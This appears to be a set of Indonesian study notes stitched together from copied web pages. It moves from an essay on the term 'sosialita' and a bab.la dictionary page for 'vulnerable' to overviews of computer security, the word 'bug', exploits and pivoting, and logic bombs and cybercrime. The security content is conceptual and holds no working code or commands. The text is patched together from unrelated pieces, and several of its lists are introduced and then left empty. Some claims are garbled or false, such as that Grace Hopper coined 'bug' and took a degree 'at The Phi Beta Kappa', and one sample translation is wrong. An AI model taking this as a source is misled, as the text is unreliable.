Sosialite adalah seseorang atau sekelompok orang yang selalu
berpartisipasi dalam aktivitas sosial dan menghabiskan waktu untuk menghibur dan dihibur pada acara-acara mode kelas atas. Menurut Merriam-Webster kalimat sosialite pertama kali digunakan pada tahun
1928. Menurut dua orang penulis buku, sosialita didefinisikan sebagai seseorang
yang aktif bersosialisasi.
Etimologi
Sosialite
adalah sebuah akronim
yang diserap dari bahasa Inggris, berasal dari kalimat sosial
dan elite. Kata
"sosial" sebagai kata sifat memiliki arti :
·
Suka
memperhatikan kepentingan umum (suka menolong, menderma, dan sebagainya),
·
Berkenaan
dengan masyarakat,
Sedangkan
"elite" sebagai kata benda memiliki arti:
·
Orang-orang
terbaik atau pilihan di suatu kelompok,
·
Kelompok
kecil orang-orang terpandang atau berderajat tinggi (kaum bangsawan, cendekiawan, dan sebagainya).
Secara bahasa
atau makna aslinya, para kaum "sosialita" adalah sebagai orang-orang
yang memiliki derajat tinggi atau terpandang, dan mereka memiliki jiwa sosial
terhadap orang-orang yang kurang
mampu. Kemudian makna kata sosialita di Indonesia terjadi pergeseran
makna yang sangat berbeda dengan makna aslinya.
Kehidupan sosialita
Jika dikaitkan
dengan defini diatas, pengertian sosialita telah mengalami pergeseran makna.
Sekarang arti kata sosialita dikaitkan dengan kehidupan mewah, glamour dan
menghabis-habiskan uang. Perbedaan makna tersebut membuat sosialita dipandang
sebelah mata, hal ini karena gaya hidup yang dijalani sebatas untuk mendapatkan
pengakuan atas kekayaannya, untuk membangun citra diri semu. Kalangan yang
fokus pada lifestyle dan mengabaikan wealthstyle.
Gaya hidup tak sesuai kemampuan kemudian mendorong mereka cenderung mengambil
jalan pintas dengan menghalalkan segala cara. Mereka ingin merasakan kenyamanan
yang semu. Kalangan ini tak mampu hidup dalam ketidaknyamanan dan menjadi
manusia yang tak bertumbuh. Sehingga yang ada di pikiran hanya sebatas tas
mahal, sepatu mahal, arisan jutaaan rupiah, cafe, club, dan kemewahan.
Tentunya ini
telah mendobrak citra sosialita, dimana Robert L. Peabody
mendefinisikan sosialita sebagai seseorang yang berpartisipasi dalam aktivitas
sosial dan menghabiskan sebagian banyak waktunya untuk menghibur sekaligus
mendapatkan hiburan. Inilah aktifitas yang tidak dilakukan oleh orang kaya
dalam menggunakan kekayaannya untuk mengadakan akitifitas sosial namun hanya
arisan duit semata.
Ø VULNERABLE
Terjemahan
bahasa Inggris-bahasa Indonesia untuk "vulnerable" "vulnerable" Terjemahan
bahasa Indonesia
Hasil: 1-9 dari 9
vulnerable {kata sifat}
vulnerable
{kt sft}
rentan {kt sft}
Unfortunately, these seed banks are
located around the world in buildings and they're vulnerable.
Sayangnya, bank benih ini terletak
di dalam gedung-gedung di seluruh dunia dan rentan terhadap kerusakan.
What it takes to turn a person who
is destitute and vulnerable into
a slave, is the absence of the rule of law.
Yang diperlukan untuk mengubah orang
yang rentan dan kekurangan
menjadi budak adalah tidak adanya peraturan hukum.
There's a lot of vulnerable people out there.
Ada banyak orang yang rentan di sana.
But kids are more vulnerable to brain injury.
Namun anak-anak lebih rentan cedera.
He begins by explaining how science
works through the testing of hypotheses that are framed to be vulnerable to disproof, and then he
goes on.
Ia mulai dengan menjelaskan
bagaimana sains bekerja melalui pengujian hipotesis yang dibentuk agar rentan terhadap bantahan, lalu ia
melanjutkan.
vulnerable
{kt sft} (juga: weak, feeble, flabby, flaccid)
lemah {kt sft}
vulnerable
{kt sft}
mudah
diserang {kt sft}
vulnerable
{kt sft}
gampang
terkena {kt sft}
vulnerable
{kt sft}
tidak
kebal {kt sft}
Contoh penggunaan untuk "vulnerable" di
bahasa Indonesia
Kalimat ini berasal dari sumber
eksternal dan mungkin tidak akurat. bab.la tidak bertanggung jawab atas isinya.
Baca lebih lanjut disini.
What this demonstrates, I think, is
how impressionable and vulnerable
we are in the face of a story, particularly as children.
Menurut saya hal ini menggambarkan
betapa mudah terpengaruh dan rapuhnya kita di hadapan suatu cerita, khususnya
anak-anak.
What makes you feel vulnerable?"
Apa yang membuat anda merasa rapuh
?"
We live in a vulnerable world.
Ini adalah dunia dimana kita hidup.
The end goal will [be] becoming vulnerable, realizing the place of our
connection to one another, rather than becoming secure, in control and alone.
Tujuan akhirnya akan menjadi rapuh,
menyadari posisi dari hubungan kita satu sama lain, daripada menjadi aman, terkendali,
dan sendirian.
Ø SECURITY HOLE
Keamanan komputer atau dalam Bahasa Inggris computer security atau dikenal juga dengan sebutan cybersecurity atau IT security adalah keamanan informasi
yang diaplikasikan kepada komputer dan jaringannya. Computer security atau keamanan komputer bertujuan membantu
user agar dapat mencegah penipuan atau mendeteksi adanya usaha penipuan di
sebuah sistem yang berbasis informasi. Informasinya sendiri memiliki arti non fisik.
Keamanan komputer adalah suatu cabang teknologi yang
dikenal dengan nama keamanan informasi yang diterapkan pada komputer. Sasaran
keamanan komputer antara lain adalah sebagai perlindungan informasi terhadap
pencurian atau korupsi, atau pemeliharaan ketersediaan, seperti dijabarkan
dalam kebijakan keamanan.
Sistem keamanan komputer merupakan sebuah upaya
yang dilakukan untuk mengamankan kinerja dan proses komputer. Penerapan
computer security dalam kehidupan sehari-hari berguna sebagai penjaga sumber
daya sistem agar tidak digunakan, modifikasi, interupsi, dan
diganggu oleh orang yang tidak berwenang. Keamanan bisa diindentifikasikan
dalam masalah teknis, manajerial, legalitas, dan politis. computer
security akan membahas 2 hal penting yaitu Ancaman/Threats dan Kelemahan sistem/vulnerabillity.
Keamanan komputer memberikan persyaratan terhadap
komputer yang berbeda dari kebanyakan persyaratan sistem
karena sering kali berbentuk pembatasan terhadap apa yang tidak boleh dilakukan
komputer. Ini membuat keamanan komputer menjadi lebih menantang karena sudah
cukup sulit untuk membuat program komputer melakukan segala apa yang sudah dirancang untuk dilakukan dengan benar.
Persyaratan negatif juga sukar untuk dipenuhi dan membutuhkan pengujian
mendalam untuk verifikasinya, yang tidak praktis bagi kebanyakan program
komputer. Keamanan komputer memberikan strategi teknis untuk mengubah
persyaratan negatif menjadi aturan positif yang dapat ditegakkan.
Pendekatan yang umum dilakukan untuk meningkatkan
keamanan komputer antara lain adalah dengan membatasi akses fisik terhadap
komputer, menerapkan mekanisme pada perangkat keras dan sistem operasi untuk keamanan komputer, serta membuat
strategi pemrograman untuk menghasilkan program komputer yang dapat diandalkan.
Keamanan komputer (Computer Security) merupakan suatu cabang teknologi yang dikenal
dengan nama keamanan informasi yang diterapkan pada komputer. Pengertian
tentang keamanan komputer ini beragam-ragam, sebagai contoh dapat kita lihat
beberapa defenisi keamanan komputer menurut para ahlinya, antara lain :
Menurut John
D. Howard dalam bukunya
“An Analysis of security incidents on the internet” menyatakan bahwa : “Keamanan
komputer adalah tindakan pencegahan dari serangan pengguna komputer atau
pengakses jaringan yang tidak bertanggung jawab”.
Menurut Gollmann pada tahun 1999 dalam bukunya “Computer
Security” menyatakan bahwa : “Keamanan komputer adalah berhubungan dengan
pencegahan diri dan deteksi terhadap tindakan pengganggu yang tidak dikenali
dalam system komputer”.
Menurut Garfinkel dan Spafford, ahli dalam computer security,
komputer dikatakan aman jika bisa diandalkan dan perangkat lunaknya bekerja
sesuai dengan yang diharapkan. Keamanan komputer memiliki 5 tujuan, yaitu:
1.
Availability
2.
Integrity
3.
Control
4.
Audit
5.
Confidentiality
Berusaha melindungi data dan
informasi dari orang yang tidak berada dalam ruang lingkupnya.
Berdasarkan level, metode pengamanan komputer
dibedakan berdasarkan level keamanan, dan disusun seperti piramida, yaitu:
1.
Keamanan Level 0,
merupakan keamanan fisik (Physical Security) atau keamanan tingkat awal.
Apabila keamanan fisik sudah terjaga maka keamanan di dalam computer juga akan
terjaga.
2.
Keamanan Level 1,
terdiri dari database security, data security, dan device security. Pertama
dari pembuatan database dilihat apakah menggunakan aplikasi yang sudah diakui
keamanannya. Selanjutnya adalah memperhatikan data security yaitu pendesainan
database, karena pendesain database harus memikirkan kemungkinan keamanan dari
database. Terakhir adalah device security yaitu adalah yang dipakai untuk
keamanan dari database tersebut.
3.
Keamanan Level 2,
yaitu keamanan dari segi keamanan jaringan. Keamanan ini sebagai tindak lanjut
dari keamanan level 1.
4.
Keamanan Level 3,
merupakan information security. Informasi – informasi seperti kata sandi yang
dikirimkan kepada teman atau file – file yang penting, karena takut ada orang
yang tidak sah mengetahui informasi tersebut.
5.
Keamanan Level 4,
keamanan ini adalah keseluruhan dari keamanan level 1 sampai level 3. Apabila
ada satu dari keamanan itu tidak terpenuhi maka keamanan level 4 juga tidak
terpenuhi.
Berdasarkan sistem, metode pengamanan komputer
terbagi dalam beberapa bagian antara lain :
Sebuah jaringan komputer dapat dibagi atas
kelompok jaringan eksternal (Internet atau pihak luar) kelompok jaringan
internal dan kelompok jaringan eksternal diantaranya disebut DeMilitarized Zone
(DMZ). - Pihak luar : Hanya dapat berhubungan dengan host-host yang berada
pada jaringan DMZ, sesuai dengan kebutuhan yang ada. -
Host-host pada jaringan DMZ : Secara default dapat melakukan hubungan
dengan host-host pada jaringan internal. Koneksi secara terbatas dapat
dilakukan sesuai kebutuhan. - Host-host pada jaringan Internal : Host-host
pada jaringan internal tidak dapat melakukan koneksi ke jaringan luar,
melainkan melalui perantara host pada jaringan DMZ, sehingga pihak luar tidak
mengetahui keberadaan host-host pada jaringan komputer internal.
Salah satu alat bantu yang dapat digunakan oleh
pengelola jaringan komputer adalah Security Information Management (SIM). SIM
berfungsi untuk menyediakan seluruh informasi yang terkait dengan pengamanan
jaringan komputer secara terpusat. Pada perkembangannya SIM tidak hanya
berfungsi untuk mengumpulkan data dari semua peralatan keamanan jaringan
komputer tapi juga memiliki kemampuan untuk analisis data melalui teknik
korelasi dan query data terbatas sehingga menghasilkan peringatan dan laporan
yang lebih lengkap dari masing-masing serangan. Dengan menggunakan SIM,
pengelola jaringan komputer dapat mengetahui secara efektif jika terjadi
serangan dan dapat melakukan penanganan yang lebih terarah, sehingga organisasi
keamanan jaringan komputer tersebut lebih terjamin.
Intrusion detection system (IDS) dan Intrusion
Prevention system (IPS) adalah sistem yang digunakan untuk mendeteksi dan
melindungi sebuah sistem keamanan dari serangan pihak luar atau dalam. Pada IDS
berbasiskan jaringan komputer , IDS akan menerima
kopi paket yang ditujukan pada sebuah host untuk selanjutnya memeriksa
paket-paket tersebut. Jika ditemukan paket yang berbahaya, maka IDS akan
memberikan peringatan pada pengelola sistem. Karena paket yang diperiksa adalah
salinan dari paket yang asli, maka jika ditemukan paket yang berbahaya maka
paket tersebut akan tetap mancapai host yang ditujunya.Sebuah IPS bersifat
lebih aktif daripada IDS. Bekerja sama dengan firewall, sebuah
IPS dapat memberikan keputusan apakah sebuah paket dapat diterima atau tidak
oleh sistem. Apabila IPS menemukan paket yang dikirimkan adalah paket
berbahaya, maka IPS akan memberitahu firewall sistem untuk menolak paket data
itu. Dalam membuat keputusan apakah sebuah paket data berbahaya atau tidak, IDS
dan IPS dapat memnggunakan metode
Metode Port Scanning biasanya digunakan
oleh penyerang untuk mengetahui port apa saja yang terbuka dalam sebuah sistem
jaringan komputer. Cara kerjanya dengan cara mengirimkan paket inisiasi koneksi ke
setiap port yang sudah ditentukan sebelumnya. Jika port scanner menerima
jawaban dari sebuah port, maka ada aplikasi yang sedang bekerja dan siap
menerima koneksi pada port tersebut.
Dengan melakukan packet fingerprinting, kita dapat mengetahui peralatan apa saja
yang ada dalam sebuah jaringan komputer. Hal ini sangat berguna terutama dalam
sebuah organisasi besar di mana terdapat berbagai jenis peralatan jaringan
komputer serta sistem operasi yang digunakan.
Jenis Ancaman jaringan
Probe atau yang biasa disebut probing adalah usaha
untuk mengakses sistem dan mendapatkan informasi tentang sistem
Scan adalah probing dalam jumlah besar menggunakan
suatu tool
Meliputi User compromize dan root compromize
Hacking adalah tindakan memperoleh akses ke
komputer atau jaringan komputer untuk mendapatkan atau mengubah informasi tanpa
otorisasi yang sah
Serangan Denial-of-service (DoS) mencegah pengguna
yang sah dari penggunaan layanan ketika pelaku mendapatkan akses tanpa izin ke
mesin atau data. Ini terjadi karena pelaku membanjiri jaringan dengan volume
data yang besar atau sengaja menghabiskan sumber daya yang langka atau
terbatas, seperti process control blocks atau koneksi jaringan yang tertunda.
Atau mereka mengganggu komponen fisik jaringan atau memanipulasi data yang
sedang dikirimkan, termasuk data terenkripsi.
Malicious code adalah program yang menyebabkan
kerusakan sistem ketika dijalankan. Virus, worm dan Trojan horse merupakan
jenis-jenis malicious code. - Virus komputer adalah sebuah program komputer
atau kode program yang merusak sistem komputer dan data dengan mereplikasi
dirinya sendiri melalui peng-copy-an ke program lain, boot sector komputer atau
dokumen. - Worm adalah virus yang mereplikasi dirinya sendiri yang tidak
mengubah file, tetapi ada di memory aktif, menggunakan bagian dari sistem
operasi yang otomatis dan biasanya tidak terlihat bagi pengguna. Replikasi
mereka yang tidak terkontrol memakan sumber daya sistem, melambatkan atau
menghentikan proses lain. Biasanya hanya jika ini terjadi keberadaan worm
diketahui. - Trojan horse adalah program yang sepertinya bermanfaat dan/atau
tidak berbahaya tetapi sesungguhnya memiliki fungsi merusak seperti unloading
hidden program atau command scripts yang membuat sistem rentan gangguan.
Sekumpulan teknik untuk memanipulasi orang
sehingga orang tersebut membocorkan informasi rahasia. Meskipun hal ini mirip
dengan permainan kepercayaan atau penipuan sederhana, istilah ini mengacu
kepada penipuan untuk mendapatkan informasi atau akses sistem komputer.
Beberapa jebakan yang dapat dilakukan diantaranya dengan : - Memanfaatkan
kepercayaan orang dalam bersosialisasi dengan komputer. - Memanfaatkan
kesalahan orang secara manusiawi misal : kesalahan ketik dll - Bisa dengan
cara membuat tampilan Login yang mirip (teknik fake login),
Tindakan pemalsuan terhadap data atau identitas
resmi.
Implementasi
Ada tiga macam Computer security yang berkaitan
dengan kehidupan sehari-hari antara lain :
1. Keamanan
eksternal / external security
Berkaitan dengan pengamanan
fasilitas komputer dari penyusup dan bencana seperti kebakaran /kebanjiran.
2. Keamanan
interface pemakai / user interface security
Berkaitan dengan indentifikasi
pemakai sebelum pemakai diijinkan mengakses program dan data yang disimpan
3. Keamanan
internal / internal security
Berkaitan dengan pengamanan
beragam kendali yang dibangun pada perangkat keras dan sistem
operasi yang menjamin
operasi yang handal dan tak terkorupsi untuk menjaga integritas program dan data.
Dari berbagai macam jenis implementasi computer
security ada hal yang perlu untuk diperhatikan dalam menjaga keamanan komputer.
Di bawah ini adalah dua masalah penting di kehidupan sehari-hari yang harus
diperhatikan dalam keamanan komputer :
Masalah data loss dapat disebabkan oleh :
Penyusup bisa dikategorikan kedalam dua
jenis :
Selain itu ancaman lain terhadap sistem keamanan
komputer bisa dikategorikan dalam empat macam :
Sumber daya sistem komputer dihancurkan sehingga
tidak berfungsi. Contohnya penghancuran harddisk atau pemotongan kabel. Ini
merupakan ancaman terhadap ketersediaan.
Orang yang tak diotorisasi dapat masuk / mengakses
ke sumber daya sistem. Contohnya menyalin file yang terotorisasi. Ini merupakan
ancaman terhadap kerahasiaan.
Orang yang tak diotorisasi tidak hanya dapat
mengakses tapi juga mengubah,merusak sumber daya. Contohnya mengubah isi pesan,
atau mengacak program. Ini merupakan ancaman terhadap integritas
Orang yang tak diotorisasi menyisipkan objek palsu ke dalam sistem.
Contohnya memasukkan pesan palsu, menambah data palsu. Dari kategori yang ada
diatas dan jika dikaitkan dalam kehidupan sehari-hari pasti kita akan menemukan
masalah dalam komputer.
Ancaman sistem keamanan komputer
Dibawah ini merupakan nama-nama ancaman yang
sering dilihat dalam sistem keamanan komputer.
Jenis Ancaman keamanan komputer
Berikut ini adalah contoh ancaman-ancaman yang
sering dilihat :
Manfaat
Guna manfaat sistem keamanan computer yaitu
menjaga suatu sistem komputer dari pengaksesan seseorang yang tidak memiliki
hak untuk mengakses sistem komputer tersebut. Sistem keamanan komputer semakin
dibutuhkan saat ini seiring dengan meningkatnya penggunaan komputer di seluruh
penjuru dunia. Selain itu makin meningkatnya para pengguna yang menghubungkan
jaringan LANnya ke internet, namun tidak di imbangi dengan SDM yang dapat menjaga keamanan data dan
infomasi yang dimiliki. Sehingga keamanan data yang ada menjadi terancam untuk
diakses dari orang-orang yang tidak berhak. Keamanan komputer menjadi penting
karena ini terkait dengan Privacy, Integrity, Autentication, Confidentiality dan
Availability. Beberapa ancaman keamanan komputer
adalah virus, worm, trojan, spam dan lain-lain. Masing-masingnya memiliki cara untuk mencuri data bahkan
merusak sistem komputer. Ancaman bagi keamanan sistem komputer ini tidak dapat
dihilangkan begitu saja, namun kita dapat meminimalkan hal ini dengan
menggunakan software keamanan sistem diantaranya antivirus, antispam dan sebagainya.
Faktor
Beberapa hal yang menjadikan kejahatan komputer
terus terjadi dan cenderung meningkat adalah sebagai berikut :
Dampak
Dampak negatif yang ditimbulkan dari penggunaan sistem
keamanan komputer yaitu.
Seperti juga masalah yang ada di Indonesia yang
menurut saya bisa dijadikan salah satu contoh dampak negative dari penggunaan
sistem keamanan komputer yaitu;
Berbagai program yang
digunakan untuk melakukan probing atau portscanning ini dapat diperoleh secara gratis di Internet. Salah
satu program yang paling populer adalah nmap (untuk sistem
yang berbasis UNIX, Linux) dan Superscan (untuk sistem yang berbasis Microsoft Windows). Selain
mengidentifikasi port, nmap juga bahkan
dapat mengidentifikasi jenis operating system
yang digunakan.
Ø BUG
Kekutu (bahasa
Inggris: bug), seranggaan atau galat/kesalahan program adalah suatu
kesalahan desain pada suatu katras (perangkat keras) atau katnak (perangkat lunak) yang menyebabkan peralatan atau program itu tidak berfungsi semestinya. Kekutu umumnya ditemukan
pada katnak, bukan katras.
Asal usul istilah
Pada tahun 1945, sewaktu ukuran komputer masih sebesar kamar, pihak militer Amerika
Serikat menggunakan komputer yang bernama
"Mark 1". Pada suatu hari, komputer tersebut tidak berfungsi dengan
semestinya. Setelah komputer itu diperiksa ternyata ada suatu bagian katras
yang terdapat bug (serangga). Setelah bug itu diangkat dari
katras, komputer dapat berfungsi dengan baik. Maka semenjak itu, kata bug
lekat pada dunia perkomputeran.
Kejadian kekutu yang terkenal
·
Y2K, yaitu kekutu yang berhubungan
dengan kebiasaan banyak pemrogram yang menyimpan tahun dalam format 2 angka
pada tahun 1980-an. Kebiasaan ini menimbulkan masalah saat mendekati tahun
2000, yaitu kesadaran bahwa tahun 2000 akan ditafsirkan sebagai tahun 1900.
Catatan
§ Pemadanan istilah dengan memanfaatkan awalan pembentuk kata
benda ke-, yakni yang mempunyai sifat atau ciri (KBBI III).
§ Pemadanan istilah dengan memanfaatkan akhiran pembentuk kata
benda -an, yakni sesuatu yang mempunyai sifat (KBBI II
§
Pencetus Istilah BUG untuk Pertama Kali
§
562
§
REACHES
§
Jan 16, 2016
§
Istilah BUG sering didengungkan saat
program tidak berjalan sesuai keinginan atau bisa dibilang agak ngaco.
§
Saya klik tombol ekspor laporan
kenapa baik baik saja ya? – Client
§
Bersyukur pak kalau tidak ada apa
apa, semoga kita bisa segera launch produknya. – Developer
§
Ya, itu sepotong perbincangan
client dan developer saat tidak ada bug.
§
Nah, pernah gak kita merenung
sebentar, siapa sih pencetus istilah BUG? ya, sama sekali gak terfikir oleh
kita. Karena waktu kita habis untuk memikirkan deadline skripsi atau deadline
pekerjaan yang tinggal 3 hari lagi.
§
Pencetus istilah bug adalah Grace
Brewster Murray Hopper. Grace Hopper juga merupakan tokoh yang mempopulerkan
juga istilah Debugging. Seperti teman-teman tahu istilah debugging ini
merupakan pekerjaan memperbaiki bug yang ada.
§
Grace adalah seorang Wanita Amerika
kelahiran 1906. Beliau merupakan Computer Scientist.
Grace mendapatkan gelar sarjananya dalam bidang matematika dan
fisika di The Phi Beta Kappa. Kemudian menuntaskan pendidikan magister
di Yale University pada tahun 1930. Beliau juga bekerja untuk US Navy
dan berpangkat Rear Admiral.
§
Laksamana Laut Pencetus istilah bug,
Grace Hopper
§
Istilah bug ditemukan Grace dan
kawan kawan saat mengerjakan mesin MARK II, saat itu sistem tidak berjalan
sesuai keinginan. Setelah diperiksa ternyata ada serangga yang terjebak dalam
komponen komputer yang mengganggu jalannya sistem elektronika MARK II.
Dengan agak iseng kemudian serangga tersebut disingkirkan dan ditempelkan
dalam buku catatan mereka.
§
Luar biasa! itulah yang ada di benak
saya saat membaca Biografi beliau. Tak disangka Grace Hopper
juga merupakan pencipta Compiler untuk pertama kali. Compiler tersebut dipakai untuk mesin UNIVAC. UNIVAC
kependekan dari Universal Automatic Computer, yang beberapa kali mengeluarkan
beberapa versi, mulai dari Univac II sampai Univac 1108.
§
Tidak berhenti sampai disitu, pada
tahun 1959 Grace Hopper bersama pemerintahan AS mengembangkan suatu bahasa
pemrograman yang juga fenomenal dan sering sekali disebut oleh dosen saya di
mata kuliah pemrograman, COBOL! kependekan dari Common
Business-Oriented Language. Bahasa pemrograman tersebut ditujukan untuk
kepentingan bisnis. COBOL banyak menghasilkan program finance dan sistem
administrasi untuk perusahaan dan pemerintahan.
§
COBOL buatan Grace Hopper dan kawan
kawan juga disebut sebagai bahasa pemrograman generasi ketiga. Bersanding
dengan bahasa pemrograman seperti Fortran dan ALGOL yang juga
diperkenalkan pada tahun 1950an.
§
SI Neg.
83-14878. Date: na.
Credit: Unknown (Smithsonian Institution)
Credit: Unknown (Smithsonian Institution)
§
Kisah Grace memang luar biasa. Tidak
salah jika beliau dinobatkan sebagai Ibu
Pemrograman. Salah satu wanita yang sangat berperan di dunia teknologi.
Ø EXPLOIT
(LOCAL, REMOTE)
Exploit adalah sebuah kode yang menyerang keamanan_komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal
ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan.
Bisa juga dikatakan sebuah perangkat lunak yang menyerang
kerapuhan keamanan (security vulnerability) yang spesifik namun tidak
selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak
peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa
suatu sistem memiliki kerapuhan.
Memang ada badan peneliti yang bekerja sama dengan produsen perangkat
lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan
kalau mereka menemukannya, mereka melaporkan hasil temuan ke produsen agar
produsen dapat mengambil tindakan. Meskipun demikian, exploit kadang
menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan
keamanan.
Klasifikasi
Ada beberapa metode untuk
mengklasifikasi exploit. Yang paling umum adalah dengan melihat cara exploit
membuat kontak dengan perangkat lunak yang rentan. Remote exploit
(eksploit jarak jauh) bekerja melalui jaringan dan mengeksploitasi celah
keamanan tanpa adanya akses terlebih dahulu ke sistem korban. Local exploit
(eksploit lokal) mengharuskan adanya akses terlebih dahulu ke sistem yang
rentan dan biasanya meningkatkan keleluasaan orang yang menjalankan exploit
melebihi yang diberikan oleh administrator sistem. Exploit yang menyerang aplikasi klien juga ada, biasanya terdiri dari server-server yang
dimodifikasi yang mengirimkan exploit jika diakses dengan aplikasi
klien. Exploit yang menyerang aplikasi klien juga mungkin memerlukan
beberapa interaksi dengan pengguna, dengan demikian dapat digunakan dalam
kombinasi dengan metode social
engineering. Ini adalah cara hacker masuk ke
komputer dan situs web untuk mencuri data.
Klasifikasi lain adalah dengan
tindakan terhadap sistem korban: unauthorized akses data, eksekusi kode sewenang-wenang, penolakan layanan.
Banyak exploit dirancang
untuk memberikan akses tingkat-''superuser'' ke sistem komputer. Namun, namun mungkin juga menggunakan
beberapa exploit, untuk mendapatkan akses tingkat rendah terlebih
dahulu, kemudian meningkatkan hak akses berulang kali sampai mencapai root.
Biasanya exploit tunggal
hanya dapat mengambil keuntungan dari satu celah keamanan software tertentu.
Sering kali, setelah exploit diterbitkan, celah keamanan sistem
diperbaiki melalui tambalan
sehingga exploit tak berlaku lagi untuk perangkat lunak versi terbaru.
Hal ini menjadi alasan mengapa beberapa blackhat hacker tidak mempublikasikan exploit mereka tetapi
merahasiakannya untuk diri sendiri atau hacker lainnya. Exploit tersebut
disebut sebagai 'exploit zero day' dan untuk mendapatkan akses ke exploit tersebut
adalah keinginan utama dari penyerang-penyerang amatir, yang sering dijuluki script kiddie
Jenis
Exploit pada umumnya dikategorikan dan dinamai berdasarkan kriteria
berikut:
·
Jenis celah keamanan yang mereka
eksploitasi
·
Apakah mereka perlu dijalankan pada
mesin yang sama dengan program yang memiliki celah (lokal) atau dapat
dijalankan pada satu mesin berbeda untuk menyerang program yang berjalan pada
komputer lain (remote).
Pivoting
Pivoting mengacu pada metode yang digunakan oleh penguji penetrasi yang menggunakan sistem yang telah dikuasai untuk menyerang
sistem lain pada jaringan yang sama untuk menghindari larangan seperti konfigurasi
firewall, yang dapat melarang akses langsung ke semua mesin. Sebagai contoh,
seorang penyerang menguasai web server pada jaringan perusahaan, penyerang
kemudian dapat menggunakan web server yang telah dikuasai untuk menyerang
sistem lain pada jaringan. Jenis serangan ini sering disebut serangan
multi-lapis. Pivoting juga dikenal sebagai island hopping.
Pivoting dapat dibedakan menjadi proxy pivoting dan VPN
pivoting:
·
Proxy
pivoting umumnya digambarkan sebagai
tindakan menelusuri jalur melalui target yang dikuasai menggunakan proxy
payload pada mesin dan meluncurkan serangan dari komputer ini. Jenis pivoting
ini terbatas pada TCP dan UDP tertentu yang didukung oleh proxy.
·
VPN
pivoting memungkinkan penyerang untuk
membuat terowongan lapisan ke-2 yang terenkripsi ke dalam mesin yang dikuasai
untuk mengarahkan lalu lintas jaringan apapun melalui mesin target itu,
misalnya untuk menjalankan scan kerentanan pada jaringan internal melalui mesin
yang dikuasai, secara efektif memberikan akses jaringan secara penuh kepada
penyerang seolah-olah mereka berada di belakang firewall.
Biasanya, aplikasi proxy atau VPN
yang memungkinkan pivoting, dijalankan pada komputer target sebagai payload
(perangkat lunak) dari exploit.
Lihat pula
·
Backdoor
·
Rootkit
·
Spyware
·
Worm
·
Wabbit
Ø LOGICAL BOMB
Kebutuhan
akan teknologi Jaringan Komputer semakin meningkat. Selain sebagai media
penyedia informasi, melalui Internet pula kegiatan komunitas komersial menjadi
bagian terbesar, dan terpesat pertumbuhannya serta menembus berbagai
batas negara. Bahkan melalui jaringan ini kegiatan pasar di dunia bisa
diketahui selama 24 jam. Melalui dunia internet atau disebut juga cyberspace,
apapun dapat dilakukan. Segi positif dari dunia maya ini tentu saja menambah
trend perkembangan teknologi dunia dengan segala bentuk kreatifitas manusia.
Namun dampak negatif pun tidak bisa dihindari. Tatkala pornografi marak
di media Internet, masyarakat pun tak bisa berbuat banyak. Seiring dengan
perkembangan teknologi Internet, menyebabkan munculnya kejahatan yang disebut dengan
"CyberCrime" atau kejahatan melalui jaringan Internet. Munculnya
beberapa kasus "CyberCrime" di Indonesia, seperti pencurian kartu
kredit, hacking beberapa situs, menyadap transmisi data orang lain, misalnya
email, dan memanipulasi data dengan cara menyiapkan perintah yang tidak
dikehendaki ke dalam programmer komputer. Sehingga dalam kejahatan komputer
dimungkinkan adanya delik formil dan delik materil. Delik formil adalah
perbuatan seseorang yang memasuki komputer orang lain tanpa ijin, sedangkan
delik materil adalah perbuatan yang menimbulkan akibat kerugian bagi orang
lain. Adanya CyberCrime telah menjadi ancaman stabilitas, sehingga
pemerintah sulit mengimbangi teknik kejahatan yang dilakukan dengan
teknologi komputer, khususnya jaringan internet dan intranet. Sebenarnya
definisi untuk kejahatan komputer di Indonesia ini sudah tepat. Dalam satu
kesempatan penulis sempat berbincang-bincang dengan unit reserse yang menangani
kejahatan komputer. Definisinya adalah kejahatan komputer dan kejahatan yang
berkaitan dengan komputer. Hal ini senada dengan
yang diungkapkan oleh Thomas Porter
dalam bukunya “EDP Control and Auditing” yakni computer abuse (penyalahgunaan
komputer), computer crime
Logic bomb merupakan program
komputer untuk diaktifkan pada waktu tertentu. Logic bomb merupakan metode
tertua yang digunakan untuk tujuan sabotase. Contoh kasus logic bomb ini adalah
seperti yang dilakukan oleh Donald Burleson seorang programmer perusahaan
asuransi di Amerika. Ia dipecat karena melakukan tindakan menyimpang. Dua hari
kemudian sebuah logic bomb bekerja secara otomatis mengakibatkan kira-kira
160.000 catatan penting yang terdapat pada komputer perusahaan terhapus.
Kebocoran data merupakan metode
pencurian atau pengambilan data secara tidak sah. Teknik yang digunakan mulai
dari yang sederhana seperti mengambil data dengan media penyimpanan atau dengan
teknik khusus seperti mencari kelemahan dalam sistem keamanan computer.
Contoh kasus kejahatan komputer di
Indonesia.
Pertengahan tahun 2006 media massa
memuat berita tentang perusakan situs parpol besar di Indonesia. Berita
tersebut cukup menyita perhatian pers. Media
Massa juga mengungkapkan Polri
berhasil menangkap perusak situs parpol tersebut. Kejadian itu bukan merupakan
kejadian pertama. Sebelumnya Polri berhasil menangkap perusak situs KPU
pada saat penghitungan hasil pemilu.
Sejak mulai ramai penggunaan
internet di Indonesia, pada saat itu pula mulai merebak kejahatan komputer di
internet atau yang lebih dikenal dengan istilah Cyber Crime. Kejahatan pertama
yang berhasil diungkap adalah penggunaan kartu kredit orang lain untuk
digunakan bertransaksi di internet. Kejahatan dengan menggunakan kartu kredit
orang lain memang mudah dilakukan. Cukup mengetahui nama pemegang kartu, nomor
kartu, dan tanggal kadaluwarsa. Selanjutnya tinggal pakai untuk transaksi.
Pertanyaan yang muncul dari tertangkapnya pelaku cyber crime di atas adalah
pelanggaran apa yang dikenakan? Mereka dijerat dengan tuduhan penipuan
atau perusakan milik pemerintah. Dengan kata lain, sanksi konvensional
karena Indonesia sampai saat ini belum memiliki undang-undang yang jelas
tentang kejahatan komputer ini. Hal berbeda dengan negara-negara lain yang
menganggap kejahatan komputer ini merupakan kejahatan yang serius. Amerika
Serikat memiliki Computer Fraud and Abuse Act 1986 yang merupakan
peraturan kriminalitas komputer yang mencakup tindakan-tindakan seperti
akses data ke komputer lembaga keuangan, pemerintah atau dengan negara lain
dalam urusan komersial yang tidak sah. Penerobosan password juga dilarang.
Tindakan kejahatan ditentukan dengan adanya kerusakan $1000 atau lebih pada
